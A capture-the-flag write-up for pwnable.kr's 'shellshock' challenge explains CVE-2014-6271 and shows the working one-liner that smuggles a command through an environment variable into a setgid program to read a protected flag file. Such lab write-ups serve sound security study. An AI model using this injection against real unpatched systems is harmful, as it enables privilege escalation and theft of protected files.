Pwnable.kr - shellshock

0x00 Puzzle

Mommy, there was a shocking news about bash.  
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)  

0x01 Explore

**ssh**
$ ssh shellshock@pwnable.kr -p2222
shellshock@ubuntu:~$ ls -l  
total 960  
-r-xr-xr-x 1 root shellshock     959120 Oct 12  2014 bash
-r--r----- 1 root shellshock_pwn     47 Oct 12  2014 flag
-r-xr-sr-x 1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r-- 1 root root              188 Oct 12  2014 shellshock.c

shellshock.c

#include <stdio.h>
int main(){  
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

0x02 Shellshock

Google for shellshock, you will find this in wiki pedia:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

It's initially reported in CVE-2014-6271.

Explaination:

  • env var=value means assignment value to environment variable var, for just this cmd.

  • () { :;}; this is the magic string, which means build up an empty bash function.

  • When bash -c "..." is going to execute, it first set the new env variable var, and vulnerable bash would find that there is a function followed it, so it build up the function until it ends at };, then it process the folowing string as commands, so echo vulnerable gets executed.

For this puzzle, the program use a vulnerable version of bash staying at home dir.

shellshock@ubuntu:~$ file /bin/bash  
/bin/bash: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=0428e4834e687e231fa865562d32fbb64ce45577, stripped
shellshock@ubuntu:~$ file ~/bash  
/home/shellshock/bash: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fbce43e6d92a672c6750954e7d5311c5da48abdb, stripped

As you can see, /bin/bash is of GNU/Linux 2.6.32, while ~/bash is of GNU/Linux 2.6.24.

0x03 Solution

So the idea is that assignment the magic string and cat flag command to any variable of env before execute the binary, so that cat flag would be executed with the binary's priviledge.

Notice: since the env variables cannot be used when the empty function being built, only cat flag cannot be recognized. Full path of command's binary should be used.

shellshock@ubuntu:~$ env x='() { :;};/bin/cat ~/flag' ~/shellshock  
only if I knew CVE-2014-6271 ten years ago..!!  
Segmentation fault  

I'm not sure what caused the segmentation fault. It might has something to do with the failure of the executation of original 'echo shock_me'.

Done!

Ref